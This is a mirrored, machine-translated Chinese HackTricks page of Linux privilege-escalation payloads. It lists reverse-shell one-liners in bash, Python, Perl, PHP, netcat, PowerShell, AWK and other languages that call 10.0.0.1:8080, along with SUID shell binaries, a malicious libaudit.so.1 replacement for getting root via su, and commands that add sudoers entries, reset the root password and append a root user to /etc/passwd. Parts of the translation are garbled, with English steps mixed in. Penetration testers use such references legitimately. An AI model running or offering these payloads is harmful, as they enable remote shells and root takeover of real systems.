Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-hardening/privilege-escalation/payloads-to-execute.md
Translator workflow a21a0e7217 Translated to Chinese
2023-08-03 19:12:22 +00:00

12 KiB
Raw Blame History

执行负载

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

Bash

cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu

C

Shell

bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'

0<&196;exec 196<>/dev/tcp/10.0.0.1/8080; sh <&196 >&196 2>&196

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PHP

php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",8080);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 8080

nc -e /bin/bash 10.0.0.1 8080

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8080 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 8080 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

xterm -display 10.0.0.1:1

xterm -display 10.0.0.1:1 -e /bin/bash

socat

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:8080

socat file:`tty`,raw,echo=0 tcp-listen:8080

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 8080 0/tmp/p

telnet 10.0.0.1 8080 | /bin/bash | telnet 10.0.0.1 8081

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Node.js

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1');

require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1');

Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','8080');os.execute('/bin/bash -i <&3 >&3 2>&3');"

MySQL

\! /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

\! /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

AWK

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'

AWK (alternative)

awk 'BEGIN {system("/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")}'

awk 'BEGIN {system("/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")}'

AWK (alternative)

awk 'BEGIN {system("/bin/bash -c \"bash -i >& /dev/tcp/10.0.0.1/8080 0>&1\"")}'

awk 'BEGIN {system("/bin/bash -c \"bash -i >& /dev/tcp/10.0.0.1/8080 0>&1\"")}'

//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}

//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}

// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}

覆盖文件以提升权限

常见文件

  • /etc/passwd 中添加带密码的用户
  • /etc/shadow 中更改密码
  • /etc/sudoers 中将用户添加到sudoers
  • 通过docker套接字滥用docker通常在 /run/docker.sock/var/run/docker.sock

覆盖库文件

检查某个二进制文件使用的库文件,例如 /bin/su

ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)

在这种情况下,让我们尝试冒充 /lib/x86_64-linux-gnu/libaudit.so.1
因此,检查 su 二进制文件使用的此库的函数:

objdump -T /bin/su | grep audit
0000000000000000      DF *UND*  0000000000000000              audit_open
0000000000000000      DF *UND*  0000000000000000              audit_log_user_message
0000000000000000      DF *UND*  0000000000000000              audit_log_acct_message
000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd

符号audit_openaudit_log_acct_messageaudit_log_acct_messageaudit_fd可能来自于libaudit.so.1库。由于恶意共享库将覆盖libaudit.so.1,这些符号应该存在于新的共享库中,否则程序将无法找到符号并退出。

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c

int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;

void inject()__attribute__((constructor));

void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

现在,只需调用 /bin/su,您将获得 root 权限的 shell。

脚本

您能让 root 执行某些操作吗?

将 www-data 添加到 sudoers

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

更改 root 密码

To change the root password, you can use the following command:

要更改 root 密码,可以使用以下命令:

sudo passwd root

You will be prompted to enter the new password twice. After successfully changing the password, you can log in as root using the new password.

echo "root:hacked" | chpasswd

将新的root用户添加到/etc/passwd文件中

To add a new root user to the /etc/passwd file, you can follow these steps:

  1. Open the /etc/passwd file using a text editor.
  2. Locate the line that starts with root and copy it.
  3. Paste the copied line at the end of the file.
  4. Modify the username to a unique name for the new root user.
  5. Change the user ID (UID) to 0 to assign root privileges.
  6. Change the group ID (GID) to 0 to assign root group privileges.
  7. Update the home directory and shell fields if necessary.
  8. Save the changes and exit the text editor.

After completing these steps, you will have successfully added a new root user to the /etc/passwd file.

echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥